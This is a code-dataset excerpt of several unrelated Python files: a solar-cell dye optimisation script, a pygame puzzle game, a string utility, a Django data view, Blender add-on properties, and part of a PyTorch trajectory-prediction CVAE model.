################### Find the Pearson Correlation for all combinations ###################\r\n\r\n # Calculate correlation between solar irradiance and F evaluated at fractions f1-f6\r\n corr = pearsonr(spectrum_regression(wavelength), F(f1, f2, f3, f4, f5, f6))\r\n \r\n # If you are evaluating more than 6 dyes, (e.g 7), adjust line 210 as follows:\r\n # corr = pearsonr(spectrum_regression(wavelength), F(f1, f2, f3, f4, f5, f6, f7))\r\n \r\n # Append the previous value to the correlation storage array\r\n correlation.append(corr[0])\r\n \r\n\r\n ################### Find the integral value for all combinations ###################\r\n\r\n # Define function to return the integral of the RBF model over domain\r\n def I(I1, I2, I3, I4, I5, I6):\r\n \r\n # If you are evaluating more than 6 dyes, (e.g 7), adjust line 222 as follows:\r\n # def I(I1, I2, I3, I4, I5, I6, I7):\r\n \r\n return integrate.trapezoid(F(I1, I2, I3, I4, I5, I6), wavelength)\r\n \r\n # If you are evaluating more than 6 dyes, (e.g 7), adjust line 227 as follows:\r\n # return integrate.trapezoid(F(I1, I2, I3, I4, I5, I6, I7), wavelength)\r\n\r\n # Integrate F evaluated at fractions f1-f6\r\n integ = I(f1, f2, f3, f4, f5, f6)\r\n \r\n # If you are evaluating more than 6 dyes, (e.g 7), adjust line 233 as follows:\r\n # integ = I(f1, f2, f3, f4, f5, f6, f7)\r\n \r\n # Append the previous value to the integral storage array\r\n integral.append(integ)\r\n\r\n\r\n ################### Find the covariance for all combinations ###################\r\n\r\n # Calculate covariance between solar irradiance and F evaluated at fractions f1-f6\r\n cov = np.cov(spectrum_regression(wavelength), F(f1, f2, f3, f4, f5, f6))\r\n \r\n # If you are evaluating more than 6 dyes, (e.g 7), adjust line 245 as follows:\r\n # cov = np.cov(spectrum_regression(wavelength), F(f1, f2, f3, f4, f5, f6, f7))\r\n \r\n \r\n # Append the previous value to the covariance storage array\r\n covariance.append(cov[0, 1])\r\n\r\n\r\n\r\n\r\n################### Find characteristic values in correlation, integral & covariance arrays ###################\r\n\r\n\r\n################### Find best Pearson Correlation fit ###################\r\n\r\n# Store the maximum values of 'correlation' in a new array\r\ncorrelation_answer = list(np.where(correlation == max(correlation)))\r\n\r\n# Check if there are muliple maximum values in 'correlation'\r\nif len(correlation_answer) > 1:\r\n print('There are multiple correlation best fits. Print correlation_answer to verify.')\r\n \r\nelse:\r\n a = int(correlation_answer[0])\r\n print('\\n\\nThe volume fractions of correlation best fit are:')\r\n print(f'A={V1[a]:.1f}, B={V2[a]:.1f}, K={V3[a]:.1f}, M={V4[a]:.1f}, C={V5[a]:.1f}, P={V6[a]:.1f}\\n')\r\n \r\n # If you are evaluating more than 6 dyes, (e.g 7), adjust line 272 as follows:\r\n # print(f'A={V1[a]:.1f}, B={V2[a]:.1f}, K={V3[a]:.1f}, M={V4[a]:.1f}, C={V5[a]:.1f}, P={V6[a]:.1f}, NEWDYE={V7[a]:.1f}\\n')\r\n\r\n# Define function to plot correlation coefficient vs. the index of the volume fraction meshgrid if allow = True\r\n# Note: The red dot indicates the max value in the correlation vector. The combination assosciated with this\r\n # Max value index is printed as the figure subtitle\r\ndef plotcorrelationcoefficient(allow = True):\r\n \r\n if allow:\r\n \r\n plt.figure(1)\r\n plt.plot(correlation)\r\n plt.scatter(a, max(correlation), color = 'r')\r\n plt.xlabel('Volume Fraction Index')\r\n plt.ylabel('Pearson Correlation Coefficient (Unitless)')\r\n plt.suptitle('Correlation Coefficient vs. VF Index')\r\n plt.title(f'A={V1[a]:.1f}, B={V2[a]:.1f}, K={V3[a]:.1f}, M={V4[a]:.1f}, C={V5[a]:.1f}, P={V6[a]:.1f}',\r\n fontsize = 10)\r\n #plt.savefig('Correlation_Plot', dpi = 500)\r\n \r\n # If you are evaluating more than 6 dyes, (e.g 7), adjust line 290 as follows:\r\n # plt.title(f'A={V1[a]:.1f}, B={V2[a]:.1f}, K={V3[a]:.1f}, M={V4[a]:.1f}, C={V5[a]:.1f}, P={V6[a]:.1f, NEWDYE={V7[a]:.1f}', fontsize = 10)\r\n\r\n if not allow: pass\r\n\r\n# Option to plot correlation coefficient vs. volume fraction index\r\nplotcorrelationcoefficient(allow = True)\r\n\r\n# Define function to plot the LHE of the combination optimized by correlation fitment vs. the solar irradiance spectrum\r\ndef plotcorrelationcombination(allow = True):\r\n \r\n if allow:\r\n \r\n fig2, ax2 = plt.subplots()\r\n ax21 = ax2.twinx()\r\n ax2.plot(wavelength, np.clip(F(V1[a], V2[a], V3[a], V4[a], V5[a], V6[a]), 0, None),\r\n label = 'LHE Spectrum', color = 'orange')\r\n ax21.plot(wavelength, spectrum_regression(wavelength), label = 'Solar Irradiance')\r\n ax2.set_xlabel('Wavelength (nm)')\r\n ax2.set_ylabel('Light Harvesting Efficency (Unitless)')\r\n ax21.set_ylabel('Solar Irradiance (W*m$^{-2}$*nm$^{-1}$)')\r\n plt.suptitle('Correlation Fitment')\r\n plt.title(f'A={V1[a]:.1f}, B={V2[a]:.1f}, K={V3[a]:.1f}, M={V4[a]:.1f}, C={V5[a]:.1f}, P={V6[a]:.1f}',\r\n fontsize = 10)\r\n fig2.legend(bbox_to_anchor = (0.9, 0.75), loc = 'lower right', prop = {\"size\" : 8})\r\n plt.show()\r\n #fig.savefig(Correlation_Fitment, dpi = 500)\r\n \r\n # If you are evaluating more than 6 dyes, (e.g 7), adjust lines 309 and 316 as follows:\r\n # ax2.plot(wavelength, np.clip(F(V1[a], V2[a], V3[a], V4[a], V5[a], V6[a], V7[a]), 0, None), label = 'LHE Spectrum', color = 'orange')\r\n # plt.title(f'A={V1[a]:.1f}, B={V2[a]:.1f}, K={V3[a]:.1f}, M={V4[a]:.1f}, C={V5[a]:.1f}, P={V6[a]:.1f, NEWDYE={V7[a]:.1f}', fontsize = 10)\r\n \r\n if not allow: pass\r\n\r\n# Option to plot LHE of combination that maximizes the correlation fitment\r\nplotcorrelationcombination(allow = True)\r\n \r\n\r\n\r\n\r\n################### Find best integral fit ###################\r\n\r\n# Store the maximum values of 'integral' in a new array\r\nintegral_answer = list(np.where(integral == max(integral)))\r\n\r\n# Check if there are muliple maximum values in 'integral'\r\nif len(integral_answer) > 1:\r\n print('There are multiple integral best fits. Print integral_answer to verify.')\r\n \r\nelse:\r\n b = int(integral_answer[0])\r\n print('The volume fractions of integral best fit are:')\r\n print(f'A={V1[b]:.1f}, B={V2[b]:.1f}, K={V3[b]:.1f}, M={V4[b]:.1f}, C={V5[b]:.1f}, P={V6[b]:.1f}\\n')\r\n \r\n # If you are evaluating more than 6 dyes, (e.g 7), adjust line 346 as follows:\r\n # print(f'A={V1[b]:.1f}, B={V2[b]:.1f}, K={V3[b]:.1f}, M={V4[b]:.1f}, C={V5[b]:.1f}, P={V6[b]:.1f}, NEWDYE={V7[b]:.1f}\\n')\r\n \r\n# Define function to plot the absorbance integral vs. the index of the volume fraction meshgrid if allow = True\r\n# Note: The red dot indicates the max value in the integral vector. The combination assosciated with this\r\n # Max value index is printed as the figure subtitle\r\ndef plotintegralfit(allow = True):\r\n \r\n if allow:\r\n \r\n plt.figure(3) \r\n plt.plot(integral)\r\n plt.scatter(b, max(integral), color = 'r')\r\n plt.xlabel('Volume Fraction Index')\r\n plt.ylabel('Spectrum Integral (nm)')\r\n plt.suptitle('Integral Value vs. VF Index')\r\n plt.title(f'A={V1[b]:.1f}, B={V2[b]:.1f}, K={V3[b]:.1f}, M={V4[b]:.1f}, C={V5[b]:.1f}, P={V6[b]:.1f}',\r\n fontsize = 10)\r\n #plt.savefig('Integral_Plot', dpi = 500)\r\n \r\n # If you are evaluating more than 6 dyes, (e.g 7), adjust line 364 as follows:\r\n # plt.title(f'A={V1[b]:.1f}, B={V2[b]:.1f}, K={V3[b]:.1f}, M={V4[b]:.1f}, C={V5[b]:.1f}, P={V6[b]:.1f, NEWDYE={V7[b]:.1f}', fontsize = 10)\r\n\r\n if not allow: pass\r\n \r\n# Option to plot absorbance integral vs. volume fraction index\r\nplotintegralfit(allow = True) \r\n \r\n# Define function to plot the LHE of the combination optimized by integral fitment vs. the solar irradiance spectrum\r\ndef plotintegralcombination(allow = True):\r\n \r\n if allow:\r\n \r\n fig4, ax4 = plt.subplots()\r\n ax41 = ax4.twinx()\r\n ax4.plot(wavelength, np.clip(F(V1[b], V2[b], V3[b], V4[b], V5[b], V6[b]), 0, None),\r\n label = 'LHE Spectrum', color = 'orange')\r\n ax41.plot(wavelength, spectrum_regression(wavelength), label = 'Solar Irradiance')\r\n ax4.set_xlabel('Wavelength (nm)')\r\n ax4.set_ylabel('Light Harvesting Efficency (Unitless)')\r\n ax41.set_ylabel('Solar Irradiance (W*m$^{-2}$*nm$^{-1}$)')\r\n plt.suptitle('Integral Fitment')\r\n plt.title(f'A={V1[b]:.1f}, B={V2[b]:.1f}, K={V3[b]:.1f}, M={V4[b]:.1f}, C={V5[b]:.1f}, P={V6[b]:.1f}',\r\n fontsize = 10)\r\n fig4.legend(bbox_to_anchor = (0.9, 0.75), loc = 'lower right', prop = {\"size\" : 8})\r\n plt.show()\r\n #fig.savefig(Integral_Fitment, dpi = 500)\r\n \r\n # If you are evaluating more than 6 dyes, (e.g 7), adjust lines 383 and 390 as follows:\r\n # ax2.plot(wavelength, np.clip(F(V1[b], V2[b], V3[b], V4[b], V5[b], V6[b], V7[b]), 0, None), label = 'LHE Spectrum', color = 'orange')\r\n # plt.title(f'A={V1[b]:.1f}, B={V2[b]:.1f}, K={V3[b]:.1f}, M={V4[b]:.1f}, C={V5[b]:.1f}, P={V6[b]:.1f, NEWDYE={V7[b]:.1f}', fontsize = 10)\r\n \r\n if not allow: pass\r\n\r\n# Option to plot LHE of combination that maximizes the integral fitment\r\nplotintegralcombination(allow = True)\r\n\r\n\r\n################### Find best covariance fit ###################\r\n\r\n# Store the maximum values of 'covariance' in a new array\r\ncovariance_answer = list(np.where(covariance == max(covariance)))\r\n\r\n# Check if there are muliple maximum values in 'covariance'\r\nif len(covariance_answer) > 1:\r\n print('There are multiple covariance best fits. Print covariance_answer to verify.')\r\n \r\nelse:\r\n c = int(covariance_answer[0])\r\n print('The volume fractions of covariance best fit are:')\r\n print(f'A={V1[c]:.1f}, B={V2[c]:.1f}, K={V3[c]:.1f}, M={V4[c]:.1f}, C={V5[c]:.1f}, P={V6[c]:.1f}\\n')\r\n \r\n # If you are evaluating more than 6 dyes, (e.g 7), adjust line 418 as follows:\r\n # print(f'A={V1[c]:.1f}, B={V2[c]:.1f}, K={V3[c]:.1f}, M={V4[c]:.1f}, C={V5[c]:.1f}, P={V6[c]:.1f}, NEWDYE={V7[c]:.1f}\\n')\r\n\r\n# Define function to plot absorbance covariance vs. the index of the volume fraction meshgrid if allow = True\r\n# Note: The red dot indicates the max value in the covariance vector. The combination assosciated with this\r\n # Max value index is printed as the figure subtitle\r\ndef plotcovariancefit(allow = True):\r\n \r\n if allow:\r\n \r\n plt.figure(5)\r\n plt.plot(covariance)\r\n plt.scatter(c, max(covariance), color = 'r')\r\n plt.xlabel('Volume Fraction Index')\r\n plt.ylabel('Covariance (nm)')\r\n plt.suptitle('Covariance vs. VF Index')\r\n plt.title(f'A={V1[c]:.1f}, B={V2[c]:.1f}, K={V3[c]:.1f}, M={V4[c]:.1f}, C={V5[c]:.1f}, P={V6[c]:.1f}',\r\n fontsize = 10)\r\n #plt.savefig('Covariance_Plot', dpi = 500)\r\n \r\n # If you are evaluating more than 6 dyes, (e.g 7), adjust line 436 as follows:\r\n # plt.title(f'A={V1[c]:.1f}, B={V2[c]:.1f}, K={V3[c]:.1f}, M={V4[c]:.1f}, C={V5[c]:.1f}, P={V6[c]:.1f, NEWDYE={V7[c]:.1f}', fontsize = 10)\r\n\r\n \r\n if not allow: pass\r\n \r\n# Option to plot covariance vs. volume fraction index\r\nplotcovariancefit(allow = True) \r\n\r\n# Define function to plot the LHE of the combination optimized by covariance fitment vs. the solar irradiance spectrum\r\ndef plotcovariancecombination(allow = True):\r\n \r\n if allow:\r\n \r\n fig6, ax6 = plt.subplots()\r\n ax61 = ax6.twinx()\r\n ax6.plot(wavelength, np.clip(F(V1[c], V2[c], V3[c], V4[c], V5[c], V6[c]), 0, None),\r\n label = 'LHE Spectrum', color = 'orange')\r\n ax61.plot(wavelength, spectrum_regression(wavelength), label = 'Solar Irradiance')\r\n ax6.set_xlabel('Wavelength (nm)')\r\n ax6.set_ylabel('Light Harvesting Efficency (Unitless)')\r\n ax61.set_ylabel('Solar Irradiance (W*m$^{-2}$*nm$^{-1}$)')\r\n plt.suptitle('Covariance Fitment')\r\n plt.title(f'A={V1[c]:.1f}, B={V2[c]:.1f}, K={V3[c]:.1f}, M={V4[c]:.1f}, C={V5[c]:.1f}, P={V6[c]:.1f}',\r\n fontsize = 10)\r\n fig6.legend(bbox_to_anchor = (0.9, 0.75), loc = 'lower right', prop = {\"size\" : 8})\r\n plt.show()\r\n #fig.savefig(ovariance_Fitment, dpi = 500)\r\n \r\n # If you are evaluating more than 6 dyes, (e.g 7), adjust lines 456 and 463 as follows:\r\n # ax2.plot(wavelength, np.clip(F(V1[c], V2[c], V3[c], V4[c], V5[c], V6[c], V7[c]), 0, None), label = 'LHE Spectrum', color = 'orange')\r\n # plt.title(f'A={V1[c]:.1f}, B={V2[c]:.1f}, K={V3[c]:.1f}, M={V4[c]:.1f}, C={V5[c]:.1f}, P={V6[c]:.1f, NEWDYE={V7[c]:.1f}', fontsize = 10)\r\n \r\n if not allow: pass\r\n\r\n# Option to plot LHE of combination that maximizes the integral fitment\r\nplotcovariancecombination(allow = True)","repo_name":"noahmanz/Optimizing-the-Combination-of-Natural-Pigments-for-Co-Sensitization-of-Panchromatic-TiO2-DSSCs","sub_path":"Optimization_Script.py","file_name":"Optimization_Script.py","file_ext":"py","file_size_in_byte":21200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"3212412998","text":"import itertools\nimport queue\nimport random\nfrom typing import Tuple, Dict\n\nimport pygame\nfrom pygame.sprite import Sprite\nfrom pygame import Rect\n\n\nSCREENRECT = Rect(0, 0, 900, 600)\n\nEVENT_CASCADE_TICK = pygame.USEREVENT + 1\npygame.time.set_timer(EVENT_CASCADE_TICK, 100)\n\n\nclass Surfaces:\n def __init__(self):\n self.surfaces = [\n self._new(self._right, self._down),\n self._new(self._down, self._left),\n self._new(self._left, self._up),\n self._new(self._up, self._right),\n ]\n\n def __getitem__(self, item):\n return self.surfaces[item]\n\n def _down(self, small, big):\n return Rect(big - small, big - small, 2 * small, small + big)\n\n def _right(self, small, big):\n return Rect(big - small, big - small, small + big, 2 * small,)\n\n def _left(self, small, big):\n return Rect(0, big - small, small + big, 2 * small,)\n\n def _up(self, small, big):\n return Rect(big - small, 0, 2 * small, small + big,)\n\n def _new(self, rect1, rect2):\n return [\n self._new_color(rect1, rect2, (0, 0, 255)),\n self._new_color(rect1, rect2, (0, 255, 0)),\n self._new_color(rect1, rect2, (255, 0, 0)),\n ]\n\n def _new_color(self, rect1, rect2, color):\n surf = pygame.Surface((50, 50))\n pygame.draw.circle(surf, color, (25, 25), 25)\n small = 2\n big = 25\n pygame.draw.rect(surf, (255, 255, 255), rect1(small, big))\n pygame.draw.rect(surf, (255, 255, 255), rect2(small, big))\n return surf\n\n\nclass Ball(Sprite):\n def __init__(\n self,\n surfaces: Surfaces,\n rotation: int,\n center,\n balls_to_rotate: queue.Queue,\n color: int,\n ):\n super().__init__()\n self.center = center\n self.rotation = rotation\n self.center_pos = (50 + center[0] * 50, 50 + center[1] * 50)\n self.surfaces = surfaces\n self.neighbors: Dict[int, Ball] = {}\n self.balls_to_rotate = balls_to_rotate\n self.color = color\n\n def rect(self):\n surf = self.surfaces[self.rotation][self.color]\n return surf.get_rect(center=self.center_pos)\n\n def surf(self) -> Tuple[pygame.Surface, Rect]:\n surf = self.surfaces[self.rotation][self.color]\n return surf, surf.get_rect(center=self.center_pos)\n\n def move_ip(self, x, y):\n self.center_pos = (self.center_pos[0] + x, self.center_pos[1] + y)\n\n def rotate(self, color=None):\n i = (self.rotation + 1) % 4\n self.rotation = i\n neighbor = self.neighbors.get(i)\n if neighbor is not None:\n if self.match(neighbor):\n self.balls_to_rotate.put((neighbor, self.color))\n\n if color is not None:\n self.color = color\n\n def set_left(self, ball: \"Ball\"):\n self.neighbors[3] = ball\n\n def set_down(self, ball: \"Ball\"):\n self.neighbors[0] = ball\n\n def set_right(self, ball: \"Ball\"):\n self.neighbors[1] = ball\n\n def set_up(self, ball: \"Ball\"):\n self.neighbors[2] = ball\n\n def match(self, other: \"Ball\"):\n if other.rotation == self.rotation:\n return False\n if other.rotation == (self.rotation + 1) % 4:\n return False\n return True\n\n\nclass App:\n def __init__(self):\n winstyle = 0\n bestdepth = pygame.display.mode_ok(SCREENRECT.size, winstyle, 32)\n self.screen = pygame.display.set_mode(SCREENRECT.size, winstyle, bestdepth)\n pygame.display.set_caption(\"Cascade\")\n self.running = True\n\n self.balls_to_rotate = queue.LifoQueue()\n\n surfaces = Surfaces()\n balls = {}\n\n grid_size = 10\n grid = list(itertools.product(range(grid_size), range(grid_size)))\n for i, j in grid:\n balls[i, j] = Ball(\n surfaces=surfaces,\n rotation=random.randint(0, 3),\n center=(i, j),\n balls_to_rotate=self.balls_to_rotate,\n color=random.randint(0, 2),\n )\n\n grid_rect = Rect(0, 0, 0, 0)\n for ball in balls.values():\n grid_rect.union_ip(ball.rect())\n shift = (\n SCREENRECT.width / 2 - grid_rect.width / 2,\n SCREENRECT.height / 2 - grid_rect.height / 2,\n )\n\n for ball in balls.values(): # type: Ball\n ball.move_ip(*shift)\n\n def ok(i, j):\n return i >= 0 and j >= 0 and i < grid_size and j < grid_size\n\n for i, j in grid:\n if ok(i + 1, j):\n balls[i, j].set_left(balls[i + 1, j])\n if ok(i, j + 1):\n balls[i, j].set_down(balls[i, j + 1])\n if ok(i - 1, j):\n balls[i, j].set_right(balls[i - 1, j])\n if ok(i, j - 1):\n balls[i, j].set_up(balls[i, j - 1])\n\n self.balls = pygame.sprite.Group(*[b for b in balls.values()])\n\n def run(self):\n\n while self.running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.running = False\n elif event.type == pygame.MOUSEBUTTONDOWN:\n for ball in self.balls:\n assert isinstance(ball, Ball)\n if ball.rect().collidepoint(event.pos):\n ball.rotate()\n elif event.type == EVENT_CASCADE_TICK:\n if not self.balls_to_rotate.empty():\n ball, color = self.balls_to_rotate.get()\n ball.rotate(color=color)\n\n for ball in self.balls: # type: Ball\n surf, rect = ball.surf()\n self.screen.blit(surf, rect)\n\n pygame.display.flip()\n\n pygame.quit()\n\n\ndef main(winstyle=0):\n pygame.init()\n app = App()\n app.run()\n pygame.quit()\n","repo_name":"grihabor/cascade","sub_path":"src/cascade/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"14978104556","text":"#make a dict of bigger string and then for every word in the second string remove the count in the dict, return the list of remaining words\ndef missingWords(s, t):\n ls = s.split(' ')\n lt = t.split(' ')\n counter = collections.Counter(lt)\n res = []\n for s in ls:\n if s in counter:\n counter[s] -= 1\n if counter[s] == 0:\n del counter[s]\n else:\n res.append(s)\n return \" \".join(res)","repo_name":"imjaya/Leetcode_solved","sub_path":"twosigma_missing_words.py","file_name":"twosigma_missing_words.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"1911036653","text":"#coding=utf-8\nfrom mysite.iclock.models import *\nfrom django.utils.encoding import smart_str\nfrom mysite.utils import *\n#from django.utils import simplejson\nfrom mysite.iclock.iutils import *\ndef getMiniData(request, ModelName):\n\t# dialog 获取数据\n\tminiData=request.GET.get(\"key\", \"\")\n\ttoResponse = \"'\"\n\tpk, pk_note, pk_note2, objs = (None, None, None, None)\n\tif miniData == \"UserID\":\n\t\tpk, pk_note, pk_note2 = (\"id\", \"PIN\", \"EName\")\n\t\tobjs = employee.objects.all()\n\t\tobjs=objs.order_by(\"PIN\").values(\"id\", \"PIN\", \"EName\")\n\tif miniData in [\"SN\",\"Device\"]:\n\t\tif not request.user.is_superuser:\n\t\t\tdepts=userDeptList(request.user)\n\t\t\tsns=IclockDept.objects.filter(dept__in=depts).values_list('SN')\n\t\t\tsnlist=[]\n\t\t\tfor sn in sns:\n\t\t\t\tsnlist.append(sn[0])\n\t\t\tobjs = iclock.objects.filter(SN__in=snlist).exclude(DelTag=1)\n\t\telse:\n\t\t\tobjs = iclock.objects.filter(Q(DelTag__isnull=True)|Q(DelTag=0))\n\t\tpk, pk_note = (\"SN\", \"Alias\")\n\t\tobjs=objs.order_by(\"Alias\").values(\"SN\", \"Alias\")\n\telif miniData in [\"DeptID\", \"depart\"]:\n\t\tpk, pk_note = (\"DeptNumber\", \"DeptName\")\n\t\tif (not request.user.is_superuser) and (not request.user.is_alldept ):\t\t\t\n\t\t\tdept_list=userDeptList(request.user)\n#\t\t\tdd=[]\n#\t\t\tfor i in dept_list:\n#\t\t\t\tdd.append(int(i.DeptID))\n\t\t\tobjs=department.objects.filter(DeptID__in=dept_list).values(\"DeptNumber\", \"DeptName\")\n\t\telse:\n\t\t\tobjs = department.objects.all().values(\"DeptNumber\", \"DeptName\")\n\telif miniData in [\"User\", \"Administrator\"]:\n\t\tpk, pk_note = (\"id\", \"username\")\n\t\tobjs = User.objects.all().values(\"id\", \"username\")\n\tres={}\n\tif len(objs)>0:\n\t\tfor row in objs:\n\t\t\tres[row[pk]]=(\"%s\"%row[pk_note])+(pk_note2 and\n (\" %s\"%row[pk_note2]) or \"\")\n#\t\tprint res\n\ttoResponse = dumps1(res)\n\treturn getJSResponse(toResponse)\n","repo_name":"sq2012/my-job","sub_path":"ecopro-10.0_ZKHNZZ-20170724-02/mysite/iclock/datamini.py","file_name":"datamini.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"35682846095","text":"import bpy\nfrom . import misc_functions\n\nfrom bpy.props import (StringProperty, BoolProperty, IntProperty, FloatProperty, FloatVectorProperty, EnumProperty, PointerProperty)\nfrom bpy.types import (Panel, Operator, AddonPreferences, PropertyGroup)\n\nclass NTZEDGCRV_ignitproperties(bpy.types.PropertyGroup):\n\n bShowOptions : BoolProperty (\n name=\"Show Options\",\n description=\"Reveals options.\",\n default = False,\n )\n\n customEdgeCurveSettings_List = [\n (\"UNSET\", \"Unset (Use Last Known)\", \"\", \"\", 0),\n (\"USE\", \"Custom\", \"\", \"\", 1),\n ]\n\n customEdgeCurveSettings : EnumProperty (\n items = customEdgeCurveSettings_List,\n name = \"Use Custom Edge Curve Settings\",\n default = \"USE\"\n )\n\n useEdgeFlowCheckbox : BoolProperty(\n name=\"Use Edge Flow\",\n description=\"Applies edge flow to the newly created edge loops. (Default: True)\",\n default = True\n )\n\n numSegmentsSlider : IntProperty(\n name=\"Segment Num\",\n description=\"Number of segments to add. (Default: 1)\",\n default = 1,\n min = 1,\n soft_max = 16\n )\n\n numIterationsSlider : IntProperty(\n name=\"Num Iterations\",\n description=\"Number of iterations. (Default: 1)\",\n default = 4,\n min = 1,\n soft_max = 128\n )\n\n tensionSlider : IntProperty(\n name=\"Tension\",\n description=\"Tension (Default: 180)\",\n default = 180,\n max = 500,\n min = -500\n )\n\n minAngleSlider : IntProperty(\n name=\"Minimum Angle\",\n description=\"Minimum Angle (Default: 0)\",\n default = 0,\n max = 180,\n min = 0\n )","repo_name":"Neltulz/Neltulz_Edge_Curve_Plus","sub_path":"properties.py","file_name":"properties.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"60"} +{"seq_id":"72883659390","text":"import warnings\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport numpy as np\nfrom model.model_utils import ModeKeys,rgetattr,rsetattr,CustomLR,exp_anneal,sigmoid_anneal,unpack_RNN_state,run_lstm_on_variable_length_seqs,mutual_inf_mc\nfrom model.dynamics import SingleIntegrator\nfrom model.discrete_latent import DiscreteLatent\nfrom model.gmm3d import GMM3D\n\nclass MultimodalGenerativeCVAE(nn.Module):\n def __init__(self,\n hyperparams,\n device,\n log_writer=None):\n super(MultimodalGenerativeCVAE,self).__init__()\n self.hyperparams = hyperparams\n self.log_writer = log_writer\n self.device = device\n self.curr_iter = 0\n\n self.node_modules = nn.ModuleDict()\n\n self.min_hl = self.hyperparams['minimum_history_length']\n self.max_hl = self.hyperparams['maximum_history_length']\n self.ph = self.hyperparams['prediction_horizon']\n self.state = self.hyperparams['state']\n self.pred_state = self.hyperparams['pred_state']\n self.state_length = int(np.sum([len(entity_dims) for entity_dims in self.state.values()]))\n\n self.pred_state_length = int(np.sum([len(entity_dims) for entity_dims in self.pred_state.values()]))\n self.create_graphical_model()\n\n dyn_limits = hyperparams['dynamic']['limits']\n self.dynamic = SingleIntegrator(1./self.hyperparams['frequency'], dyn_limits, device, self.x_size)\n\n def set_curr_iter(self, curr_iter):\n self.curr_iter = curr_iter\n\n def add_submodule(self, name, model):\n self.node_modules[name] = model.to(self.device)\n\n def clear_submodules(self):\n self.node_modules.clear()\n\n def create_node_models(self):\n ############################\n # Node History Encoder #\n ############################\n self.add_submodule('/node_history_encoder',\n model=nn.LSTM(input_size=self.state_length,\n hidden_size=self.hyperparams['enc_rnn_dim_history'],\n batch_first=True))\n\n ###########################\n # Node Future Encoder #\n ###########################\n # We'll create this here, but then later check if in training mode.\n # Based on that, we'll factor this into the computation graph (or not).\n self.add_submodule('/node_future_encoder',\n model=nn.LSTM(input_size=self.pred_state_length,\n hidden_size=self.hyperparams['enc_rnn_dim_future'],\n bidirectional=True,\n batch_first=True))\n # These are related to how you initialize states for the node future encoder.\n self.add_submodule('/node_future_encoder/initial_h',\n model=nn.Linear(self.state_length,\n self.hyperparams['enc_rnn_dim_future']))\n self.add_submodule('/node_future_encoder/initial_c',\n model=nn.Linear(self.state_length,\n self.hyperparams['enc_rnn_dim_future']))\n\n\n ################################\n # Discrete Latent Variable #\n ################################\n self.latent = DiscreteLatent(self.hyperparams, self.device)\n\n ######################################################################\n # Various Fully-Connected Layers from Encoder to Latent Variable #\n ######################################################################\n # Node History Encoder\n x_size = self.hyperparams['enc_rnn_dim_history']\n\n z_size = self.hyperparams['N'] * self.hyperparams['K']\n\n if self.hyperparams['p_z_x_MLP_dims'] is not None:\n self.add_submodule('/p_z_x',\n model=nn.Linear(x_size, self.hyperparams['p_z_x_MLP_dims']))\n hx_size = self.hyperparams['p_z_x_MLP_dims']\n else:\n hx_size = x_size\n\n self.add_submodule('/hx_to_z',\n model=nn.Linear(hx_size, self.latent.z_dim))\n\n if self.hyperparams['q_z_xy_MLP_dims'] is not None:\n self.add_submodule('/q_z_xy',\n # Node Future Encoder\n model=nn.Linear(x_size + 4 * self.hyperparams['enc_rnn_dim_future'],\n self.hyperparams['q_z_xy_MLP_dims']))\n hxy_size = self.hyperparams['q_z_xy_MLP_dims']\n else:\n # Node Future Encoder\n hxy_size = x_size + 4 * self.hyperparams['enc_rnn_dim_future']\n\n self.add_submodule('/hxy_to_z',\n model=nn.Linear(hxy_size, self.latent.z_dim))\n\n ####################\n # Decoder LSTM #\n ####################\n decoder_input_dims = self.pred_state_length + z_size + x_size\n\n self.add_submodule('/decoder/state_action',\n model=nn.Sequential(\n nn.Linear(self.state_length, self.pred_state_length)))\n\n self.add_submodule( '/decoder/rnn_cell',\n model=nn.GRUCell(decoder_input_dims, self.hyperparams['dec_rnn_dim']))\n self.add_submodule('/decoder/initial_h',\n model=nn.Linear(z_size + x_size, self.hyperparams['dec_rnn_dim']))\n\n ###################\n # Decoder GMM #\n ###################\n self.add_submodule('/decoder/proj_to_GMM_log_pis',\n model=nn.Linear(self.hyperparams['dec_rnn_dim'],\n self.hyperparams['GMM_components']))\n self.add_submodule('/decoder/proj_to_GMM_mus',\n model=nn.Linear(self.hyperparams['dec_rnn_dim'],\n self.hyperparams['GMM_components'] * self.pred_state_length))\n self.add_submodule('/decoder/proj_to_GMM_log_sigmas',\n model=nn.Linear(self.hyperparams['dec_rnn_dim'],\n self.hyperparams['GMM_components'] * self.pred_state_length))\n self.add_submodule('/decoder/proj_to_GMM_corrs',\n model=nn.Linear(self.hyperparams['dec_rnn_dim'],\n self.hyperparams['GMM_components']*3))\n\n self.x_size = x_size\n self.z_size = z_size\n\n\n def create_new_scheduler(self, name, annealer, annealer_kws, creation_condition=True):\n value_scheduler = None\n rsetattr(self, name + '_scheduler', value_scheduler)\n if creation_condition:\n annealer_kws['device'] = self.device\n value_annealer = annealer(annealer_kws)\n rsetattr(self, name + '_annealer', value_annealer)\n\n # This is the value that we'll update on each call of\n # step_annealers().\n rsetattr(self, name, value_annealer(0).clone().detach())\n dummy_optimizer = optim.Optimizer([rgetattr(self, name)], {'lr': value_annealer(0).clone().detach()})\n rsetattr(self, name + '_optimizer', dummy_optimizer)\n\n value_scheduler = CustomLR(dummy_optimizer,\n value_annealer)\n rsetattr(self, name + '_scheduler', value_scheduler)\n\n self.schedulers.append(value_scheduler)\n self.annealed_vars.append(name)\n\n \n def create_graphical_model(self):\n \"\"\"\n Creates or queries all trainable components.\n\n :param edge_types: List containing strings for all possible edge types for the node type.\n :return: None\n \"\"\"\n self.clear_submodules()\n\n ############################\n # Everything but Edges #\n ############################\n self.create_node_models()\n\n for name, module in self.node_modules.items():\n module.to(self.device)\n\n def set_annealing_params(self):\n self.schedulers = list()\n self.annealed_vars = list()\n\n self.create_new_scheduler(name='kl_weight',\n annealer=sigmoid_anneal,\n annealer_kws={\n 'start': self.hyperparams['kl_weight_start'],\n 'finish': 